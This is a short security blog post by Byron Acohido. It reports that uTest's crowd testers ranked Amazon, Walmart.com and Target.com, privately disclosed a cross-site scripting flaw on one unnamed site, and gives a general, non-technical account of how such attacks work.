uTest discovers cross-site scripting vulnerability on major retailer’s site

utest-275pxU-Test has just completed a substantive, independent review of three major e-tailing sites — and found a gaping security hole in one of them.

U-Test retains a stable of 21,000 professional testers from 159 countries available to run any website through the paces. As part of its marketing efforts, U-Test has been running a once-a-quarter contest by which its testers can earn cash testing certain groupings of online services.

In this case, uTest paid 600 software professionals from 20 countries to click away at Amazon, Walmart.com and Target.com, then rank the e-tailers based on best pricing, ease of use, product search capacity, reviews and ratings and product comparison tools.

The consensus: Amazon is more bug-free and user-friendly than rivals Walmart.com and Target.com. But uTesters also discovered a cross-site scripting vulnerability at one of the three major sites. Johnston declined to name the e-retailer, noting that uTest has notified the retailer about the security hole.

mattjohnston_90px“Only one of the sites had a security issue, but it’s our practice to reach out to the site owner and not disclose who it is,” he says.

Johnston said the vulnerability was of the type that would “allow (user) accounts to be taken over” and give an intruder full access to “all of the sensitive information in the account.”

Cross-site scripting vulnerabilities show up when Web apps fail to validate user input from form fields. Attackers can embed their own script into a page the user is visiting to purposefully manipulate the behavior or appearance of the page. Malicious attacks  are limited only by the attacker’s imagination, as LastWatchdog described in this 31Mar2008 USA Today story.

Most often attackers will create a specially-crafted Web link, and then entice a visitor into clicking to it, via spam, Facebook messages, Tweets, etc. — another reason why bad URLs are proliferating. The user is more likely to be tricked to clicking on the link, since it’s from a trusted company.

It would be interesting to see uTest turn its testers loose on other security-related reviews. Suggestions welcomed. Please comment below.

–Byron Acohido

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone